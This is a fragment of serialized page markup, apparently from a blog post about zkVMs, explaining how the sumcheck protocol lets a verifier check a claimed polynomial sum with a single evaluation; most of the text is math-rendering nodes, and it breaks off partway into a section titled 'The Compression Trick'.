claim:",{"type":26,"tag":35,"props":111362,"children":111363},{},[111364],{"type":26,"tag":130,"props":111365,"children":111367},{"className":111366},[133,134],[111368],{"type":26,"tag":137,"props":111369,"children":111371},{"className":111370},[140],[111372],{"type":26,"tag":137,"props":111373,"children":111375},{"className":111374,"ariaHidden":146},[145],[111376,111402],{"type":26,"tag":137,"props":111377,"children":111379},{"className":111378},[151],[111380,111384,111389,111393,111398],{"type":26,"tag":137,"props":111381,"children":111383},{"className":111382,"style":1512},[156],[],{"type":26,"tag":137,"props":111385,"children":111387},{"className":111386,"style":1517},[169,170],[111388],{"type":32,"value":1520},{"type":26,"tag":137,"props":111390,"children":111392},{"className":111391,"style":281},[184],[],{"type":26,"tag":137,"props":111394,"children":111396},{"className":111395},[286],[111397],{"type":32,"value":289},{"type":26,"tag":137,"props":111399,"children":111401},{"className":111400,"style":281},[184],[],{"type":26,"tag":137,"props":111403,"children":111405},{"className":111404},[151],[111406,111410,111559,111563,111706,111710,111717,111721,111865,111869,111875,111880,111937,111942,111946,112003,112008,112012,112018,112022,112027,112031,112089],{"type":26,"tag":137,"props":111407,"children":111409},{"className":111408,"style":24208},[156],[],{"type":26,"tag":137,"props":111411,"children":111413},{"className":111412},[3722],[111414,111419],{"type":26,"tag":137,"props":111415,"children":111417},{"className":111416,"style":3725},[3722,3723,3724],[111418],{"type":32,"value":3728},{"type":26,"tag":137,"props":111420,"children":111422},{"className":111421},[236],[111423],{"type":26,"tag":137,"props":111424,"children":111426},{"className":111425},[241,417],[111427,111548],{"type":26,"tag":137,"props":111428,"children":111430},{"className":111429},[246],[111431,111543],{"type":26,"tag":137,"props":111432,"children":111434},{"className":111433,"style":24235},[251],[111435],{"type":26,"tag":137,"props":111436,"children":111437},{"style":24239},[111438,111442],{"type":26,"tag":137,"props":111439,"children":111441},{"className":111440,"style":262},[261],[],{"type":26,"tag":137,"props":111443,"children":111445},{"className":111444},[267,268,269,270],[111446],{"type":26,"tag":137,"props":111447,"children":111449},{"className":111448},[169,270],[111450,111513,111518,111523,111528,111533,111538],{"type":26,"tag":137,"props":111451,"children":111453},{"className":111452},[169,270],[111454,111459],{"type":26,"tag":137,"props":111455,"children":111457},{"className":111456},[169,170,270],[111458],{"type":32,"value":173},{"type":26,"tag":137,"props":111460,"children":111462},{"className":111461},[236],[111463],{"type":26,"tag":137,"props":111464,"children":111466},{"className":111465},[241,417],[111467,111501],{"type":26,"tag":137,"props":111468,"children":111470},{"className":111469},[246],[111471,111496],{"type":26,"tag":137,"props":111472,"children":111475},{"className":111473,"style":111474},[251],"height:0.3173em;",[111476],{"type":26,"tag":137,"props":111477,"children":111479},{"style":111478},"top:-2.357em;margin-left:0em;margin-right:0.0714em;",[111480,111485],{"type":26,"tag":137,"props":111481,"children":111484},{"className":111482,"style":111483},[261],"height:2.5em;",[],{"type":26,"tag":137,"props":111486,"children":111490},{"className":111487},[267,111488,111489,270],"reset-size3","size1",[111491],{"type":26,"tag":137,"props":111492,"children":111494},{"className":111493},[169,270],[111495],{"type":32,"value":878},{"type":26,"tag":137,"props":111497,"children":111499},{"className":111498},[453],[111500],{"type":32,"value":456},{"type":26,"tag":137,"props":111502,"children":111504},{"className":111503},[246],[111505],{"type":26,"tag":137,"props":111506,"children":111509},{"className":111507,"style":111508},[251],"height:0.143em;",[111510],{"type":26,"tag":137,"props":111511,"children":111512},{},[],{"type":26,"tag":137,"props":111514,"children":111516},{"className":111515},[286,270],[111517],{"type":32,"value":24279},{"type":26,"tag":137,"props":111519,"children":111521},{"className":111520},[162,270],[111522],{"type":32,"value":79221},{"type":26,"tag":137,"props":111524,"children":111526},{"className":111525},[169,270],[111527],{"type":32,"value":1817},{"type":26,"tag":137,"props":111529,"children":111531},{"className":111530},[177,270],[111532],{"type":32,"value":180},{"type":26,"tag":137,"props":111534,"children":111536},{"className":111535},[169,270],[111537],{"type":32,"value":878},{"type":26,"tag":137,"props":111539,"children":111541},{"className":111540},[197,270],[111542],{"type":32,"value":36736},{"type":26,"tag":137,"props":111544,"children":111546},{"className":111545},[453],[111547],{"type":32,"value":456},{"type":26,"tag":137,"props":111549,"children":111551},{"className":111550},[246],[111552],{"type":26,"tag":137,"props":111553,"children":111555},{"className":111554,"style":24336},[251],[111556],{"type":26,"tag":137,"props":111557,"children":111558},{},[],{"type":26,"tag":137,"props":111560,"children":111562},{"className":111561,"style":185},[184],[],{"type":26,"tag":137,"props":111564,"children":111566},{"className":111565},[3722],[111567,111572],{"type":26,"tag":137,"props":111568,"children":111570},{"className":111569,"style":3725},[3722,3723,3724],[111571],{"type":32,"value":3728},{"type":26,"tag":137,"props":111573,"children":111575},{"className":111574},[236],[111576],{"type":26,"tag":137,"props":111577,"children":111579},{"className":111578},[241,417],[111580,111695],{"type":26,"tag":137,"props":111581,"children":111583},{"className":111582},[246],[111584,111690],{"type":26,"tag":137,"props":111585,"children":111587},{"className":111586,"style":24235},[251],[111588],{"type":26,"tag":137,"props":111589,"children":111590},{"style":24239},[111591,111595],{"type":26,"tag":137,"props":111592,"children":111594},{"className":111593,"style":262},[261],[],{"type":26,"tag":137,"props":111596,"children":111598},{"className":111597},[267,268,269,270],[111599],{"type":26,"tag":137,"props":111600,"children":111602},{"className":111601},[169,270],[111603,111660,111665,111670,111675,111680,111685],{"type":26,"tag":137,"props":111604,"children":111606},{"className":111605},[169,270],[111607,111612],{"type":26,"tag":137,"props":111608,"children":111610},{"className":111609},[169,170,270],[111611],{"type":32,"value":173},{"type":26,"tag":137,"props":111613,"children":111615},{"className":111614},[236],[111616],{"type":26,"tag":137,"props":111617,"children":111619},{"className":111618},[241,417],[111620,111649],{"type":26,"tag":137,"props":111621,"children":111623},{"className":111622},[246],[111624,111644],{"type":26,"tag":137,"props":111625,"children":111627},{"className":111626,"style":111474},[251],[111628],{"type":26,"tag":137,"props":111629,"children":111630},{"style":111478},[111631,111635],{"type":26,"tag":137,"props":111632,"children":111634},{"className":111633,"style":111483},[261],[],{"type":26,"tag":137,"props":111636,"children":111638},{"className":111637},[267,111488,111489,270],[111639],{"type":26,"tag":137,"props":111640,"children":111642},{"className":111641},[169,270],[111643],{"type":32,"value":277},{"type":26,"tag":137,"props":111645,"children":111647},{"className":111646},[453],[111648],{"type":32,"value":456},{"type":26,"tag":137,"props":111650,"children":111652},{"className":111651},[246],[111653],{"type":26,"tag":137,"props":111654,"children":111656},{"className":111655,"style":111508},[251],[111657],{"type":26,"tag":137,"props":111658,"children":111659},{},[],{"type":26,"tag":137,"props":111661,"children":111663},{"className":111662},[286,270],[111664],{"type":32,"value":24279},{"type":26,"tag":137,"props":111666,"children":111668},{"className":111667},[162,270],[111669],{"type":32,"value":79221},{"type":26,"tag":137,"props":111671,"children":111673},{"className":111672},[169,270],[111674],{"type":32,"value":1817},{"type":26,"tag":137,"props":111676,"children":111678},{"className":111677},[177,270],[111679],{"type":32,"value":180},{"type":26,"tag":137,"props":111681,"children":111683},{"className":111682},[169,270],[111684],{"type":32,"value":878},{"type":26,"tag":137,"props":111686,"children":111688},{"className":111687},[197,270],[111689],{"type":32,"value":36736},{"type":26,"tag":137,"props":111691,"children":111693},{"className":111692},[453],[111694],{"type":32,"value":456},{"type":26,"tag":137,"props":111696,"children":111698},{"className":111697},[246],[111699],{"type":26,"tag":137,"props":111700,"children":111702},{"className":111701,"style":24336},[251],[111703],{"type":26,"tag":137,"props":111704,"children":111705},{},[],{"type":26,"tag":137,"props":111707,"children":111709},{"className":111708,"style":185},[184],[],{"type":26,"tag":137,"props":111711,"children":111714},{"className":111712},[111713],"minner",[111715],{"type":32,"value":111716},"⋯",{"type":26,"tag":137,"props":111718,"children":111720},{"className":111719,"style":185},[184],[],{"type":26,"tag":137,"props":111722,"children":111724},{"className":111723},[3722],[111725,111730],{"type":26,"tag":137,"props":111726,"children":111728},{"className":111727,"style":3725},[3722,3723,3724],[111729],{"type":32,"value":3728},{"type":26,"tag":137,"props":111731,"children":111733},{"className":111732},[236],[111734],{"type":26,"tag":137,"props":111735,"children":111737},{"className":111736},[241,417],[111738,111854],{"type":26,"tag":137,"props":111739,"children":111741},{"className":111740},[246],[111742,111849],{"type":26,"tag":137,"props":111743,"children":111745},{"className":111744,"style":24235},[251],[111746],{"type":26,"tag":137,"props":111747,"children":111748},{"style":24239},[111749,111753],{"type":26,"tag":137,"props":111750,"children":111752},{"className":111751,"style":262},[261],[],{"type":26,"tag":137,"props":111754,"children":111756},{"className":111755},[267,268,269,270],[111757],{"type":26,"tag":137,"props":111758,"children":111760},{"className":111759},[169,270],[111761,111819,111824,111829,111834,111839,111844],{"type":26,"tag":137,"props":111762,"children":111764},{"className":111763},[169,270],[111765,111770],{"type":26,"tag":137,"props":111766,"children":111768},{"className":111767},[169,170,270],[111769],{"type":32,"value":173},{"type":26,"tag":137,"props":111771,"children":111773},{"className":111772},[236],[111774],{"type":26,"tag":137,"props":111775,"children":111777},{"className":111776},[241,417],[111778,111808],{"type":26,"tag":137,"props":111779,"children":111781},{"className":111780},[246],[111782,111803],{"type":26,"tag":137,"props":111783,"children":111786},{"className":111784,"style":111785},[251],"height:0.1645em;",[111787],{"type":26,"tag":137,"props":111788,"children":111789},{"style":111478},[111790,111794],{"type":26,"tag":137,"props":111791,"children":111793},{"className":111792,"style":111483},[261],[],{"type":26,"tag":137,"props":111795,"children":111797},{"className":111796},[267,111488,111489,270],[111798],{"type":26,"tag":137,"props":111799,"children":111801},{"className":111800},[169,170,270],[111802],{"type":32,"value":1549},{"type":26,"tag":137,"props":111804,"children":111806},{"className":111805},[453],[111807],{"type":32,"value":456},{"type":26,"tag":137,"props":111809,"children":111811},{"className":111810},[246],[111812],{"type":26,"tag":137,"props":111813,"children":111815},{"className":111814,"style":111508},[251],[111816],{"type":26,"tag":137,"props":111817,"children":111818},{},[],{"type":26,"tag":137,"props":111820,"children":111822},{"className":111821},[286,270],[111823],{"type":32,"value":24279},{"type":26,"tag":137,"props":111825,"children":111827},{"className":111826},[162,270],[111828],{"type":32,"value":79221},{"type":26,"tag":137,"props":111830,"children":111832},{"className":111831},[169,270],[111833],{"type":32,"value":1817},{"type":26,"tag":137,"props":111835,"children":111837},{"className":111836},[177,270],[111838],{"type":32,"value":180},{"type":26,"tag":137,"props":111840,"children":111842},{"className":111841},[169,270],[111843],{"type":32,"value":878},{"type":26,"tag":137,"props":111845,"children":111847},{"className":111846},[197,270],[111848],{"type":32,"value":36736},{"type":26,"tag":137,"props":111850,"children":111852},{"className":111851},[453],[111853],{"type":32,"value":456},{"type":26,"tag":137,"props":111855,"children":111857},{"className":111856},[246],[111858],{"type":26,"tag":137,"props":111859,"children":111861},{"className":111860,"style":24336},[251],[111862],{"type":26,"tag":137,"props":111863,"children":111864},{},[],{"type":26,"tag":137,"props":111866,"children":111868},{"className":111867,"style":185},[184],[],{"type":26,"tag":137,"props":111870,"children":111872},{"className":111871,"style":190},[169,170],[111873],{"type":32,"value":111874},"g",{"type":26,"tag":137,"props":111876,"children":111878},{"className":111877},[162],[111879],{"type":32,"value":165},{"type":26,"tag":137,"props":111881,"children":111883},{"className":111882},[169],[111884,111889],{"type":26,"tag":137,"props":111885,"children":111887},{"className":111886},[169,170],[111888],{"type":32,"value":173},{"type":26,"tag":137,"props":111890,"children":111892},{"className":111891},[236],[111893],{"type":26,"tag":137,"props":111894,"children":111896},{"className":111895},[241,417],[111897,111926],{"type":26,"tag":137,"props":111898,"children":111900},{"className":111899},[246],[111901,111921],{"type":26,"tag":137,"props":111902,"children":111904},{"className":111903,"style":426},[251],[111905],{"type":26,"tag":137,"props":111906,"children":111907},{"style":430},[111908,111912],{"type":26,"tag":137,"props":111909,"children":111911},{"className":111910,"style":262},[261],[],{"type":26,"tag":137,"props":111913,"children":111915},{"className":111914},[267,268,269,270],[111916],{"type":26,"tag":137,"props":111917,"children":111919},{"className":111918},[169,270],[111920],{"type":32,"value":878},{"type":26,"tag":137,"props":111922,"children":111924},{"className":111923},[453],[111925],{"type":32,"value":456},{"type":26,"tag":137,"props":111927,"children":111929},{"className":111928},[246],[111930],{"type":26,"tag":137,"props":111931,"children":111933},{"className":111932,"style":464},[251],[111934],{"type":26,"tag":137,"props":111935,"children":111936},{},[],{"type":26,"tag":137,"props":111938,"children":111940},{"className":111939},[177],[111941],{"type":32,"value":180},{"type":26,"tag":137,"props":111943,"children":111945},{"className":111944,"style":185},[184],[],{"type":26,"tag":137,"props":111947,"children":111949},{"className":111948},[169],[111950,111955],{"type":26,"tag":137,"props":111951,"children":111953},{"className":111952},[169,170],[111954],{"type":32,"value":173},{"type":26,"tag":137,"props":111956,"children":111958},{"className":111957},[236],[111959],{"type":26,"tag":137,"props":111960,"children":111962},{"className":111961},[241,417],[111963,111992],{"type":26,"tag":137,"props":111964,"children":111966},{"className":111965},[246],[111967,111987],{"type":26,"tag":137,"props":111968,"children":111970},{"className":111969,"style":426},[251],[111971],{"type":26,"tag":137,"props":111972,"children":111973},{"style":430},[111974,111978],{"type":26,"tag":137,"props":111975,"children":111977},{"className":111976,"style":262},[261],[],{"type":26,"tag":137,"props":111979,"children":111981},{"className":111980},[267,268,269,270],[111982],{"type":26,"tag":137,"props":111983,"children":111985},{"className":111984},[169,270],[111986],{"type":32,"value":277},{"type":26,"tag":137,"props":111988,"children":111990},{"className":111989},[453],[111991],{"type":32,"value":456},{"type":26,"tag":137,"props":111993,"children":111995},{"className":111994},[246],[111996],{"type":26,"tag":137,"props":111997,"children":111999},{"className":111998,"style":464},[251],[112000],{"type":26,"tag":137,"props":112001,"children":112002},{},[],{"type":26,"tag":137,"props":112004,"children":112006},{"className":112005},[177],[112007],{"type":32,"value":180},{"type":26,"tag":137,"props":112009,"children":112011},{"className":112010,"style":185},[184],[],{"type":26,"tag":137,"props":112013,"children":112015},{"className":112014},[111713],[112016],{"type":32,"value":112017},"…",{"type":26,"tag":137,"props":112019,"children":112021},{"className":112020,"style":185},[184],[],{"type":26,"tag":137,"props":112023,"children":112025},{"className":112024},[177],[112026],{"type":32,"value":180},{"type":26,"tag":137,"props":112028,"children":112030},{"className":112029,"style":185},[184],[],{"type":26,"tag":137,"props":112032,"children":112034},{"className":112033},[169],[112035,112040],{"type":26,"tag":137,"props":112036,"children":112038},{"className":112037},[169,170],[112039],{"type":32,"value":173},{"type":26,"tag":137,"props":112041,"children":112043},{"className":112042},[236],[112044],{"type":26,"tag":137,"props":112045,"children":112047},{"className":112046},[241,417],[112048,112078],{"type":26,"tag":137,"props":112049,"children":112051},{"className":112050},[246],[112052,112073],{"type":26,"tag":137,"props":112053,"children":112056},{"className":112054,"style":112055},[251],"height:0.1514em;",[112057],{"type":26,"tag":137,"props":112058,"children":112059},{"style":430},[112060,112064],{"type":26,"tag":137,"props":112061,"children":112063},{"className":112062,"style":262},[261],[],{"type":26,"tag":137,"props":112065,"children":112067},{"className":112066},[267,268,269,270],[112068],{"type":26,"tag":137,"props":112069,"children":112071},{"className":112070},[169,170,270],[112072],{"type":32,"value":1549},{"type":26,"tag":137,"props":112074,"children":112076},{"className":112075},[453],[112077],{"type":32,"value":456},{"type":26,"tag":137,"props":112079,"children":112081},{"className":112080},[246],[112082],{"type":26,"tag":137,"props":112083,"children":112085},{"className":112084,"style":464},[251],[112086],{"type":26,"tag":137,"props":112087,"children":112088},{},[],{"type":26,"tag":137,"props":112090,"children":112092},{"className":112091},[197],[112093],{"type":32,"value":200},{"type":26,"tag":35,"props":112095,"children":112096},{},[112097,112099,112160],{"type":32,"value":112098},"The naive approach would be for the verifier to compute all ",{"type":26,"tag":130,"props":112100,"children":112102},{"className":112101},[133,134],[112103],{"type":26,"tag":137,"props":112104,"children":112106},{"className":112105},[140],[112107],{"type":26,"tag":137,"props":112108,"children":112110},{"className":112109,"ariaHidden":146},[145],[112111],{"type":26,"tag":137,"props":112112,"children":112114},{"className":112113},[151],[112115,112119],{"type":26,"tag":137,"props":112116,"children":112118},{"className":112117,"style":1908},[156],[],{"type":26,"tag":137,"props":112120,"children":112122},{"className":112121},[169],[112123,112128],{"type":26,"tag":137,"props":112124,"children":112126},{"className":112125},[169],[112127],{"type":32,"value":277},{"type":26,"tag":137,"props":112129,"children":112131},{"className":112130},[236],[112132],{"type":26,"tag":137,"props":112133,"children":112135},{"className":112134},[241],[112136],{"type":26,"tag":137,"props":112137,"children":112139},{"className":112138},[246],[112140],{"type":26,"tag":137,"props":112141,"children":112143},{"className":112142,"style":1908},[251],[112144],{"type":26,"tag":137,"props":112145,"children":112146},{"style":256},[112147,112151],{"type":26,"tag":137,"props":112148,"children":112150},{"className":112149,"style":262},[261],[],{"type":26,"tag":137,"props":112152,"children":112154},{"className":112153},[267,268,269,270],[112155],{"type":26,"tag":137,"props":112156,"children":112158},{"className":112157},[169,170,270],[112159],{"type":32,"value":1549},{"type":32,"value":112161}," evaluations. This is exponentially expensive.",{"type":26,"tag":35,"props":112163,"children":112164},{},[112165,112167,112172],{"type":32,"value":112166},"The sumcheck protocol is a clever interactive protocol that reduces the exponential number of polynomial evaluations to checking ",{"type":26,"tag":84,"props":112168,"children":112169},{},[112170],{"type":32,"value":112171},"only one",{"type":32,"value":470},{"type":26,"tag":35,"props":112174,"children":112175},{},[112176],{"type":26,"tag":2210,"props":112177,"children":112180},{"alt":112178,"src":112179},"sumcheck_v2","/posts/zkvms-unfaithful-claims/sumcheck_v2.svg",[],{"type":26,"tag":35,"props":112182,"children":112183},{},[112184,112186,112278,112280,112465,112467,112492,112494,112571,112573,112650],{"type":32,"value":112185},"In each round, the prover must send a polynomial ",{"type":26,"tag":130,"props":112187,"children":112189},{"className":112188},[133,134],[112190],{"type":26,"tag":137,"props":112191,"children":112193},{"className":112192},[140],[112194],{"type":26,"tag":137,"props":112195,"children":112197},{"className":112196,"ariaHidden":146},[145],[112198],{"type":26,"tag":137,"props":112199,"children":112201},{"className":112200},[151],[112202,112206,112263,112268,112273],{"type":26,"tag":137,"props":112203,"children":112205},{"className":112204,"style":157},[156],[],{"type":26,"tag":137,"props":112207,"children":112209},{"className":112208},[169],[112210,112215],{"type":26,"tag":137,"props":112211,"children":112213},{"className":112212,"style":190},[169,170],[112214],{"type":32,"value":111874},{"type":26,"tag":137,"props":112216,"children":112218},{"className":112217},[236],[112219],{"type":26,"tag":137,"props":112220,"children":112222},{"className":112221},[241,417],[112223,112252],{"type":26,"tag":137,"props":112224,"children":112226},{"className":112225},[246],[112227,112247],{"type":26,"tag":137,"props":112228,"children":112230},{"className":112229,"style":556},[251],[112231],{"type":26,"tag":137,"props":112232,"children":112233},{"style":819},[112234,112238],{"type":26,"tag":137,"props":112235,"children":112237},{"className":112236,"style":262},[261],[],{"type":26,"tag":137,"props":112239,"children":112241},{"className":112240},[267,268,269,270],[112242],{"type":26,"tag":137,"props":112243,"children":112245},{"className":112244},[169,170,270],[112246],{"type":32,"value":506},{"type":26,"tag":137,"props":112248,"children":112250},{"className":112249},[453],[112251],{"type":32,"value":456},{"type":26,"tag":137,"props":112253,"children":112255},{"className":112254},[246],[112256],{"type":26,"tag":137,"props":112257,"children":112259},{"className":112258,"style":464},[251],[112260],{"type":26,"tag":137,"props":112261,"children":112262},{},[],{"type":26,"tag":137,"props":112264,"children":112266},{"className":112265},[162],[112267],{"type":32,"value":165},{"type":26,"tag":137,"props":112269,"children":112271},{"className":112270,"style":97651},[169,170],[112272],{"type":32,"value":8718},{"type":26,"tag":137,"props":112274,"children":112276},{"className":112275},[197],[112277],{"type":32,"value":200},{"type":32,"value":112279}," such that ",{"type":26,"tag":130,"props":112281,"children":112283},{"className":112282},[133,134],[112284],{"type":26,"tag":137,"props":112285,"children":112287},{"className":112286},[140],[112288],{"type":26,"tag":137,"props":112289,"children":112291},{"className":112290,"ariaHidden":146},[145],[112292,112385],{"type":26,"tag":137,"props":112293,"children":112295},{"className":112294},[151],[112296,112300,112357,112362,112367,112372,112376,112381],{"type":26,"tag":137,"props":112297,"children":112299},{"className":112298,"style":157},[156],[],{"type":26,"tag":137,"props":112301,"children":112303},{"className":112302},[169],[112304,112309],{"type":26,"tag":137,"props":112305,"children":112307},{"className":112306,"style":190},[169,170],[112308],{"type":32,"value":111874},{"type":26,"tag":137,"props":112310,"children":112312},{"className":112311},[236],[112313],{"type":26,"tag":137,"props":112314,"children":112316},{"className":112315},[241,417],[112317,112346],{"type":26,"tag":137,"props":112318,"children":112320},{"className":112319},[246],[112321,112341],{"type":26,"tag":137,"props":112322,"children":112324},{"className":112323,"style":556},[251],[112325],{"type":26,"tag":137,"props":112326,"children":112327},{"style":819},[112328,112332],{"type":26,"tag":137,"props":112329,"children":112331},{"className":112330,"style":262},[261],[],{"type":26,"tag":137,"props":112333,"children":112335},{"className":112334},[267,268,269,270],[112336],{"type":26,"tag":137,"props":112337,"children":112339},{"className":112338},[169,170,270],[112340],{"type":32,"value":506},{"type":26,"tag":137,"props":112342,"children":112344},{"className":112343},[453],[112345],{"type":32,"value":456},{"type":26,"tag":137,"props":112347,"children":112349},{"className":112348},[246],[112350],{"type":26,"tag":137,"props":112351,"children":112353},{"className":112352,"style":464},[251],[112354],{"type":26,"tag":137,"props":112355,"children":112356},{},[],{"type":26,"tag":137,"props":112358,"children":112360},{"className":112359},[162],[112361],{"type":32,"value":165},{"type":26,"tag":137,"props":112363,"children":112365},{"className":112364},[169],[112366],{"type":32,"value":1817},{"type":26,"tag":137,"props":112368,"children":112370},{"className":112369},[197],[112371],{"type":32,"value":200},{"type":26,"tag":137,"props":112373,"children":112375},{"className":112374,"style":348},[184],[],{"type":26,"tag":137,"props":112377,"children":112379},{"className":112378},[353],[112380],{"type":32,"value":356},{"type":26,"tag":137,"props":112382,"children":112384},{"className":112383,"style":348},[184],[],{"type":26,"tag":137,"props":112386,"children":112388},{"className":112387},[151],[112389,112393,112450,112455,112460],{"type":26,"tag":137,"props":112390,"children":112392},{"className":112391,"style":157},[156],[],{"type":26,"tag":137,"props":112394,"children":112396},{"className":112395},[169],[112397,112402],{"type":26,"tag":137,"props":112398,"children":112400},{"className":112399,"style":190},[169,170],[112401],{"type":32,"value":111874},{"type":26,"tag":137,"props":112403,"children":112405},{"className":112404},[236],[112406],{"type":26,"tag":137,"props":112407,"children":112409},{"className":112408},[241,417],[112410,112439],{"type":26,"tag":137,"props":112411,"children":112413},{"className":112412},[246],[112414,112434],{"type":26,"tag":137,"props":112415,"children":112417},{"className":112416,"style":556},[251],[112418],{"type":26,"tag":137,"props":112419,"children":112420},{"style":819},[112421,112425],{"type":26,"tag":137,"props":112422,"children":112424},{"className":112423,"style":262},[261],[],{"type":26,"tag":137,"props":112426,"children":112428},{"className":112427},[267,268,269,270],[112429],{"type":26,"tag":137,"props":112430,"children":112432},{"className":112431},[169,170,270],[112433],{"type":32,"value":506},{"type":26,"tag":137,"props":112435,"children":112437},{"className":112436},[453],[112438],{"type":32,"value":456},{"type":26,"tag":137,"props":112440,"children":112442},{"className":112441},[246],[112443],{"type":26,"tag":137,"props":112444,"children":112446},{"className":112445,"style":464},[251],[112447],{"type":26,"tag":137,"props":112448,"children":112449},{},[],{"type":26,"tag":137,"props":112451,"children":112453},{"className":112452},[162],[112454],{"type":32,"value":165},{"type":26,"tag":137,"props":112456,"children":112458},{"className":112457},[169],[112459],{"type":32,"value":878},{"type":26,"tag":137,"props":112461,"children":112463},{"className":112462},[197],[112464],{"type":32,"value":200},{"type":32,"value":112466}," equals the previous claim. If the prover is lying about the original sum ",{"type":26,"tag":130,"props":112468,"children":112470},{"className":112469},[133,134],[112471],{"type":26,"tag":137,"props":112472,"children":112474},{"className":112473},[140],[112475],{"type":26,"tag":137,"props":112476,"children":112478},{"className":112477,"ariaHidden":146},[145],[112479],{"type":26,"tag":137,"props":112480,"children":112482},{"className":112481},[151],[112483,112487],{"type":26,"tag":137,"props":112484,"children":112486},{"className":112485,"style":1512},[156],[],{"type":26,"tag":137,"props":112488,"children":112490},{"className":112489,"style":1517},[169,170],[112491],{"type":32,"value":1520},{"type":32,"value":112493},", then they must lie about ",{"type":26,"tag":130,"props":112495,"children":112497},{"className":112496},[133,134],[112498],{"type":26,"tag":137,"props":112499,"children":112501},{"className":112500},[140],[112502],{"type":26,"tag":137,"props":112503,"children":112505},{"className":112504,"ariaHidden":146},[145],[112506],{"type":26,"tag":137,"props":112507,"children":112509},{"className":112508},[151],[112510,112514],{"type":26,"tag":137,"props":112511,"children":112513},{"className":112512,"style":788},[156],[],{"type":26,"tag":137,"props":112515,"children":112517},{"className":112516},[169],[112518,112523],{"type":26,"tag":137,"props":112519,"children":112521},{"className":112520,"style":190},[169,170],[112522],{"type":32,"value":111874},{"type":26,"tag":137,"props":112524,"children":112526},{"className":112525},[236],[112527],{"type":26,"tag":137,"props":112528,"children":112530},{"className":112529},[241,417],[112531,112560],{"type":26,"tag":137,"props":112532,"children":112534},{"className":112533},[246],[112535,112555],{"type":26,"tag":137,"props":112536,"children":112538},{"className":112537,"style":556},[251],[112539],{"type":26,"tag":137,"props":112540,"children":112541},{"style":819},[112542,112546],{"type":26,"tag":137,"props":112543,"children":112545},{"className":112544,"style":262},[261],[],{"type":26,"tag":137,"props":112547,"children":112549},{"className":112548},[267,268,269,270],[112550],{"type":26,"tag":137,"props":112551,"children":112553},{"className":112552},[169,170,270],[112554],{"type":32,"value":506},{"type":26,"tag":137,"props":112556,"children":112558},{"className":112557},[453],[112559],{"type":32,"value":456},{"type":26,"tag":137,"props":112561,"children":112563},{"className":112562},[246],[112564],{"type":26,"tag":137,"props":112565,"children":112567},{"className":112566,"style":464},[251],[112568],{"type":26,"tag":137,"props":112569,"children":112570},{},[],{"type":32,"value":112572}," somewhere. But since the verifier picks a random ",{"type":26,"tag":130,"props":112574,"children":112576},{"className":112575},[133,134],[112577],{"type":26,"tag":137,"props":112578,"children":112580},{"className":112579},[140],[112581],{"type":26,"tag":137,"props":112582,"children":112584},{"className":112583,"ariaHidden":146},[145],[112585],{"type":26,"tag":137,"props":112586,"children":112588},{"className":112587},[151],[112589,112593],{"type":26,"tag":137,"props":112590,"children":112592},{"className":112591,"style":612},[156],[],{"type":26,"tag":137,"props":112594,"children":112596},{"className":112595},[169],[112597,112602],{"type":26,"tag":137,"props":112598,"children":112600},{"className":112599,"style":621},[169,170],[112601],{"type":32,"value":624},{"type":26,"tag":137,"props":112603,"children":112605},{"className":112604},[236],[112606],{"type":26,"tag":137,"props":112607,"children":112609},{"className":112608},[241,417],[112610,112639],{"type":26,"tag":137,"props":112611,"children":112613},{"className":112612},[246],[112614,112634],{"type":26,"tag":137,"props":112615,"children":112617},{"className":112616,"style":556},[251],[112618],{"type":26,"tag":137,"props":112619,"children":112620},{"style":643},[112621,112625],{"type":26,"tag":137,"props":112622,"children":112624},{"className":112623,"style":262},[261],[],{"type":26,"tag":137,"props":112626,"children":112628},{"className":112627},[267,268,269,270],[112629],{"type":26,"tag":137,"props":112630,"children":112632},{"className":112631},[169,170,270],[112633],{"type":32,"value":506},{"type":26,"tag":137,"props":112635,"children":112637},{"className":112636},[453],[112638],{"type":32,"value":456},{"type":26,"tag":137,"props":112640,"children":112642},{"className":112641},[246],[112643],{"type":26,"tag":137,"props":112644,"children":112646},{"className":112645,"style":464},[251],[112647],{"type":26,"tag":137,"props":112648,"children":112649},{},[],{"type":32,"value":112651},", with overwhelming probability, the prover won't then be able to match the evaluation of the original polynomial.",{"type":26,"tag":21485,"props":112653,"children":112655},{"id":112654},"the-compression-trick",[112656],{"type":32,"value":112657},"The Compression Trick",{"type":26,"tag":35,"props":112659,"children":112660},{},[112661,112663,112813,112815,113095],{"type":32,"value":112662},"For degree-1 (multilinear) polynomials, ",{"type":26,"tag":130,"props":112664,"children":112666},{"className":112665},[133,134],[112667],{"type":26,"tag":137,"props":112668,"children":112670},{"className":112669},[140],[112671],{"type":26,"tag":137,"props":112672,"children":112674},{"className":112673,"ariaHidden":146},[145],[112675,112768,112795],{"type":26,"tag":137,"props":112676,"children":112678},{"className":112677},[151],[112679,112683,112740,112745,112750,112755,112759,112764],{"type":26,"tag":137,"props":112680,"children":112682},{"className":112681,"style":157},[156],[],{"type":26,"tag":137,"props":112684,"children":112686},{"className":112685},[169],[112687,112692],{"type":26,"tag":137,"props":112688,"children":112690},{"className":112689,"style":190},[169,170],[112691],{"type":32,"value":111874},{"type":26,"tag":137,"props":112693,"children":112695},{"className":112694},[236],[112696],{"type":26,"tag":137,"props":112697,"children":112699},{"className":112698},[241,417],[112700,112729],{"type":26,"tag":137,"props":112701,"children":112703},{"className":112702},[246],[112704,112724],{"type":26,"tag":137,"props":112705,"children":112707},{"className":112706,"style":556},[251],[112708],{"type":26,"tag":137,"props":112709,"children":112710},{"style":819},[112711,112715],{"type":26,"tag":137,"props":112712,"children":112714},{"className":112713,"style":262},[261],[],{"type":26,"tag":137,"props":112716,"children":112718},{"className":112717},[267,268,269,270],[112719],{"type":26,"tag":137,"props":112720,"children":112722},{"className":112721},[169,170,270],[112723],{"type":32,"value":506},{"type":26,"tag":137,"props":112725,"children":112727},{"className":112726},[453],[112728],{"type":32,"value":456},{"type":26,"tag":137,"props":112730,"children":112732},{"className":112731},[246],[112733],{"type":26,"tag":137,"props":112734,"children":112736},{"className":112735,"style":464},[251],[112737],{"type":26,"tag":137,"props":112738,"children":112739},{},[],{"type":26,"tag":137,"props":112741,"children":112743},{"className":112742},[162],[112744],{"type":32,"value":165},{"type":26,"tag":137,"props":112746,"children":112748},{"className":112747,"style":97651},[169,170],[112749],{"type":32,"value":8718},{"type":26,"tag":137,"props":112751,"children":112753},{"className":112752},[197],[112754],{"type":32,"value":200},{"type":26,"tag":137,"props":112756,"children":112758},{"className":112757,"style":281},[184],[],{"type":26,"tag":137,"props":112760,"children":112762},{"className":112761},[286],[112763],{"type":32,"value":289},{"type":26,"tag":137,"props":112765,"children":112767},{"className